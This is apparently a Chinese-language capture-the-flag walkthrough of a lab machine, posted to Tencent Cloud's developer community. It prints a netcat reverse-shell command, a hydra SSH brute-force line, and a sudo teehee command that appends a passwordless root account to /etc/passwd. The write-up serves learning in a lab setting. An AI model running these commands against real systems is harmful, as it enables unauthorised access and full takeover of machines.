拿来就给出一个网站,其他的啥也没给。

最初想法是御剑扫描一下,但是发现也没什么有用的信息,还是只有一个管理登录框。
那就爆破吧······

成功爆到一个密码。
(Ps:平时要积累字典啊,用的时候现去找的·····)
登陆后台。

发现可以进行命令执行,抓包看看。

这里可以利用啊。执行个whoami看看。

可以执行。
接下来使用nc监听反弹shell。
nc -lnvp 444
nc -e /bin/bash 192.168.70.154 444
然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。

然后hydra爆破
hydra -l jim -P jim.txt ssh://192.168.70.158
成功爆到密码。
SSH登陆账户。

随便看看。

呦,mbox是root用户发来的。
看了下test.sh.

继续翻目录,在var/mails目录下找到了jim文件,查看。

是charles发给jim的信息,透露了Password。
直接切换到charles用户。

sudo -l看看。

哎嘿,出来了路径。
teehee -help发现-a命令执行命令追加文件内容,不用进行覆盖。
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

用户名-hack
是否有密码—空
uid—0——root权限
用户信息记录位置—空
家目录—空
登录的命令解释器–/bin/bash直接su hack,不用密码即可登陆,直接是root权限。cat flag即可。

这一关卡在于最后的teehee追加文件内容。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。